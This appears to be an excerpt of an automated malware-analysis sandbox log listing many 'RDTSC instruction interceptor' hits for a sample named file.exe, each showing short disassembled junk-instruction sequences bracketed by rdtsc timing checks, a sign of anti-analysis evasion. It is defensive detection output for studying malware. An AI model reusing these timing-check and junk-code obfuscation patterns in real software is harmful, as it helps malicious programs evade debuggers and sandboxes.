                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420555 second address: 1420570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A977h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420570 second address: 1420588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jne 00007FFAE9061D66h 0x00000011 pop ecx 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142083C second address: 1420875 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007FFAE903A966h 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FFAE903A974h 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007FFAE903A966h 0x0000001f push edi 0x00000020 pop edi 0x00000021 push esi 0x00000022 pop esi 0x00000023 jbe 00007FFAE903A966h 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420B70 second address: 1420B91 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE9061D7Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420B91 second address: 1420B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14213C7 second address: 14213D1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE9061D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14292A3 second address: 14292BF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE903A970h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142940C second address: 1429411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14296B7 second address: 14296D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAE903A966h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jno 00007FFAE903A966h 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007FFAE903A966h 0x0000001d popad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14296D8 second address: 14296DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299C4 second address: 14299E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A976h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299E3 second address: 14299E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299E9 second address: 14299ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299ED second address: 14299F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299F1 second address: 1429A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFAE903A979h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAE903A96Fh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1429A32 second address: 1429A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432E50 second address: 1432E72 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAE903A966h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFAE903A968h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FFAE903A96Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432E72 second address: 1432E79 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310B7 second address: 14310BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310BB second address: 14310E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE9061D73h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310E4 second address: 14310E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143120E second address: 1431212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431212 second address: 143122C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FFAE903A972h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14314CF second address: 14314D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14314D5 second address: 14314DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14314DF second address: 14314E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431671 second address: 143167B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143167B second address: 143167F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143167F second address: 1431685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14317FE second address: 1431812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAE9061D6Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431812 second address: 1431825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFAE903A966h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431825 second address: 1431839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FFAE9061D6Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431E88 second address: 1431E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE903A96Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431E98 second address: 1431EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431EA1 second address: 1431EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436185 second address: 14361AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE9061D70h 0x0000000b push edx 0x0000000c jmp 00007FFAE9061D6Dh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14361AC second address: 14361B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144152C second address: 144153D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144153D second address: 1441541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441541 second address: 1441547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441547 second address: 1441576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE903A971h 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFAE903A971h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441576 second address: 144157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1448AE9 second address: 1448AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14484FC second address: 1448513 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAE9061D6Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1448513 second address: 1448521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FFAE903A96Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144865C second address: 1448660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144CDE2 second address: 144CDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144CDEF second address: 144CDFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FFAE9061D68h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376447 second address: 137644D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137644D second address: 1376453 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376453 second address: 137645F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137645F second address: 1376463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376463 second address: 1376481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FFAE903A96Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FFAE903A966h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457317 second address: 145731C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D618 second address: 145D63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A973h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jc 00007FFAE903A97Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D63A second address: 145D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D4CA second address: 145D4D4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAE903A966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D4D4 second address: 145D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D4DA second address: 145D4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FFAE903A966h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1465A39 second address: 1465A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1465A3D second address: 1465A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFAE903A966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jmp 00007FFAE903A96Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464735 second address: 1464739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464739 second address: 146473F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14648B1 second address: 14648B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14648B7 second address: 14648BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14648BE second address: 14648F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FFAE9061D78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAE9061D72h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14648F7 second address: 14648FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14648FB second address: 146492D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FFAE9061D8Ch 0x0000000c jmp 00007FFAE9061D75h 0x00000011 jmp 00007FFAE9061D71h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146492D second address: 1464939 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464939 second address: 146493D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464AAC second address: 1464ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jc 00007FFAE903A966h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464DA7 second address: 1464DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAE9061D76h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464DC6 second address: 1464DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1468220 second address: 1468241 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE9061D79h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AFE1 second address: 146AFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A970h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop esi 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AFFE second address: 146B00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AB92 second address: 146AB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAE903A966h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14790A2 second address: 14790E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFAE9061D66h 0x0000000a popad 0x0000000b jmp 00007FFAE9061D76h 0x00000010 pop esi 0x00000011 pushad 0x00000012 jnl 00007FFAE9061D68h 0x00000018 jmp 00007FFAE9061D74h 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FFAE9061D66h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14790E9 second address: 14790ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476317 second address: 1476338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14887BB second address: 14887D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A973h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14887D2 second address: 14887D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14884E1 second address: 14884EE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149768C second address: 14976A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFAE9061D66h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAE9061D6Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14976A9 second address: 14976B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14976B7 second address: 14976BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14976BB second address: 14976C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14976C9 second address: 14976E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE9061D78h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1497941 second address: 149794E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1499B81 second address: 1499B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C5F5 second address: 149C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C5FA second address: 149C617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C668 second address: 149C687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFAE903A966h 0x00000009 ja 00007FFAE903A966h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 jne 00007FFAE903A966h 0x0000001b pop ebx 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C687 second address: 149C6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 adc dl, FFFFFFA1h 0x0000000a push 00000004h 0x0000000c sub dword ptr [ebp+122D1EDFh], edi 0x00000012 call 00007FFAE9061D69h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FFAE9061D6Ch 0x0000001f jnp 00007FFAE9061D66h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C6B0 second address: 149C6B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149C6B5 second address: 149C6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FFAE9061D77h 0x00000010 jmp 00007FFAE9061D71h 0x00000015 rdtsc
